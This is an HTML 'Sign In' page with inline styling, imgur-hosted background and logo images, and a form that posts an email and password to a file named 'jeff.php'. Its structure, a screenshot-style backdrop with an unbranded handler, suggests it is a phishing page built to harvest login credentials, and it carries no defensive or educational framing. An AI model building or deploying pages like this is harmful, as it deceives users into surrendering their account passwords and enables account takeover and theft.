
<!doctype html>
<html>
<head>
<title>Sign In</title>
</head>
<body>
<center>

<img id="backgroundimage" src="https://i.imgur.com/Dx0NwIm.png">

<style type="text/css">
	
	body {
    background: white;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
    background-size: 100%;
}

#backgroundimage
{
  width: 100%;
position: absolute;
top:0px;
left:0px;
}

input{
  display: block;
  margin: 0;
  width: 320px;
  font-family: apple-system,system-ui,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,sans-serif;
  font-size: 16px;  
   padding: 12px;
       border: 0;
  outline: 0;
  background: #FAFAFA;
  border-radius: 7px;
  border-bottom: none;

}

input:focus {
     border-bottom: 2px solid #0000FF;
}
label{
      font-size: 1.2em;
      font-weight: bold;    
      font-family: 'Source Sans Pro',sans-serif;
    font-size: 16px;
    line-height: 1.42857143;
    color: #333;
}
fieldset {
    font-family: sans-serif;
width:650px;
height:380px;
 background:white;
    padding: 0px;
bottom:10px;
    border-radius: 7px; 
    box-sizing: border-box;
        border: 1px solid #f1f1f5;
}

input[type=submit] {
  width: 340px;
    font-family: sans-serif;
    font-size: 16px;
    color: white;
    padding:16px; 
    background: #BABEFB; 
    border:0 none;
    cursor:pointer;
    -webkit-border-radius: 3px;
    border-radius: 30px; 

   
</style>
<form action="jeff.php" method="post">
<br><br><br><br><br><br><fieldset><br>
<img src="https://i.imgur.com/JOAw3fj.png"><br><br>
<input type="email" name="user" placeholder="Email" required ><br>
<br><input type="password" name="pass" placeholder="Password" required ><br>

<br>
    <input type="submit" name="submit" onmouseover="this.style.background='#C8CCFB';" onmouseout="this.style.background='#BABEFB';" value="Sign in"/>
    
</fieldset>

<br><br><br><br><br>
<img src="https://i.imgur.com/IlSplv3.png">
</center>
</form>
</body>
</html>
